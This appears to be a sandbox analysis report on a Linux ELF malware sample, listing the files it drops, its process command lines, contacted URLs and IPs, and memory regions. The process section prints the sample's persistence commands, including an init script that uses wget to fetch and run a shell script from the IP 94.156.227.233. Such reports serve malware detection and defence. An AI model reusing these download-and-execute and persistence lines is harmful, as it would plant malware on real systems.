Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
x86_64.nn.elf
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/sh
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/x86_64.nn.elf
|
/tmp/x86_64.nn.elf
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget
http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n
killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n
exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/sh
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/sh /etc/rc.d/S99sh
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 36 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://94.156.227.233/curl.sh
|
unknown
|
||
|
http://94.156.227.233/lol.sh
|
unknown
|
||
|
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
|
unknown
|
||
|
http://94.156.227.233/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
daisy.ubuntu.com
|
162.213.35.24
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
195.47.207.121
|
unknown
|
United Kingdom
|
||
|
219.235.213.90
|
unknown
|
China
|
||
|
57.132.251.223
|
unknown
|
Belgium
|
||
|
205.12.182.177
|
unknown
|
United States
|
||
|
1.42.27.216
|
unknown
|
Australia
|
||
|
73.233.63.182
|
unknown
|
United States
|
||
|
98.170.221.219
|
unknown
|
United States
|
||
|
74.188.45.134
|
unknown
|
United States
|
||
|
202.229.109.102
|
unknown
|
Japan
|
||
|
82.94.186.200
|
unknown
|
Netherlands
|
||
|
47.31.80.210
|
unknown
|
India
|
||
|
48.63.107.18
|
unknown
|
United States
|
||
|
148.81.166.158
|
unknown
|
Poland
|
||
|
179.130.40.28
|
unknown
|
Brazil
|
||
|
35.94.191.191
|
unknown
|
United States
|
||
|
84.255.58.50
|
unknown
|
Malta
|
||
|
150.170.117.108
|
unknown
|
United States
|
||
|
41.148.142.242
|
unknown
|
South Africa
|
||
|
126.68.28.132
|
unknown
|
Japan
|
||
|
157.142.136.21
|
unknown
|
United States
|
||
|
9.112.146.90
|
unknown
|
United States
|
||
|
36.118.180.82
|
unknown
|
China
|
||
|
156.141.173.111
|
unknown
|
United States
|
||
|
214.197.165.71
|
unknown
|
United States
|
||
|
219.166.77.15
|
unknown
|
Japan
|
||
|
109.235.85.224
|
unknown
|
France
|
||
|
198.146.50.198
|
unknown
|
United States
|
||
|
62.194.143.100
|
unknown
|
Netherlands
|
||
|
164.94.212.231
|
unknown
|
United States
|
||
|
3.242.220.133
|
unknown
|
United States
|
||
|
67.42.243.145
|
unknown
|
United States
|
||
|
29.188.223.150
|
unknown
|
United States
|
||
|
170.105.159.12
|
unknown
|
Japan
|
||
|
218.145.157.212
|
unknown
|
Korea Republic of
|
||
|
45.226.46.175
|
unknown
|
Brazil
|
||
|
111.221.209.128
|
unknown
|
China
|
||
|
126.165.227.195
|
unknown
|
Japan
|
||
|
180.179.240.71
|
unknown
|
India
|
||
|
102.252.60.76
|
unknown
|
South Africa
|
||
|
187.255.91.173
|
unknown
|
Brazil
|
||
|
158.8.119.230
|
unknown
|
United States
|
||
|
118.144.22.187
|
unknown
|
China
|
||
|
68.33.106.144
|
unknown
|
United States
|
||
|
160.3.122.1
|
unknown
|
United States
|
||
|
81.103.8.49
|
unknown
|
United Kingdom
|
||
|
108.221.175.223
|
unknown
|
United States
|
||
|
199.6.149.167
|
unknown
|
United States
|
||
|
62.42.193.63
|
unknown
|
Spain
|
||
|
71.136.153.159
|
unknown
|
United States
|
||
|
20.29.14.14
|
unknown
|
United States
|
||
|
57.152.218.77
|
unknown
|
Belgium
|
||
|
98.30.50.28
|
unknown
|
United States
|
||
|
83.152.4.245
|
unknown
|
France
|
||
|
26.0.5.210
|
unknown
|
United States
|
||
|
187.85.168.239
|
unknown
|
Brazil
|
||
|
208.239.43.130
|
unknown
|
United States
|
||
|
159.250.120.170
|
unknown
|
United States
|
||
|
58.129.113.158
|
unknown
|
China
|
||
|
131.181.92.221
|
unknown
|
Australia
|
||
|
32.70.39.132
|
unknown
|
United States
|
||
|
32.64.97.6
|
unknown
|
United States
|
||
|
217.158.152.236
|
unknown
|
United Kingdom
|
||
|
140.45.52.232
|
unknown
|
United States
|
||
|
164.252.135.102
|
unknown
|
United States
|
||
|
143.43.25.13
|
unknown
|
United States
|
||
|
132.21.119.224
|
unknown
|
United States
|
||
|
88.229.213.86
|
unknown
|
Turkey
|
||
|
75.190.63.158
|
unknown
|
United States
|
||
|
92.250.140.100
|
unknown
|
Luxembourg
|
||
|
139.7.55.42
|
unknown
|
Germany
|
||
|
98.104.202.43
|
unknown
|
United States
|
||
|
165.101.223.64
|
unknown
|
unknown
|
||
|
17.248.21.185
|
unknown
|
United States
|
||
|
68.164.83.17
|
unknown
|
United States
|
||
|
128.144.14.183
|
unknown
|
Canada
|
||
|
126.207.45.14
|
unknown
|
Japan
|
||
|
52.224.65.13
|
unknown
|
United States
|
||
|
74.205.144.1
|
unknown
|
United States
|
||
|
221.61.32.45
|
unknown
|
Japan
|
||
|
28.232.224.201
|
unknown
|
United States
|
||
|
56.113.16.18
|
unknown
|
United States
|
||
|
221.101.155.195
|
unknown
|
Japan
|
||
|
145.70.40.95
|
unknown
|
Netherlands
|
||
|
32.98.60.172
|
unknown
|
United States
|
||
|
46.143.44.39
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
49.68.3.220
|
unknown
|
China
|
||
|
7.127.112.6
|
unknown
|
United States
|
||
|
42.192.229.133
|
unknown
|
China
|
||
|
91.119.83.65
|
unknown
|
Austria
|
||
|
160.221.73.249
|
unknown
|
Belgium
|
||
|
2.175.126.85
|
unknown
|
Germany
|
||
|
1.22.204.153
|
unknown
|
India
|
||
|
80.34.10.120
|
unknown
|
Spain
|
||
|
206.161.213.143
|
unknown
|
United States
|
||
|
205.186.60.86
|
unknown
|
United States
|
||
|
102.219.38.190
|
unknown
|
unknown
|
||
|
74.13.153.15
|
unknown
|
Canada
|
||
|
120.77.243.36
|
unknown
|
China
|
||
|
223.160.225.13
|
unknown
|
China
|
||
|
199.65.35.37
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
418000
|
page execute read
|
|
||
|
7ffe28644000
|
page read and write
|
|||
|
518000
|
page read and write
|
|||
|
51b000
|
page read and write
|
|||
|
232d000
|
page read and write
|
|||
|
7ffe287b9000
|
page execute read
|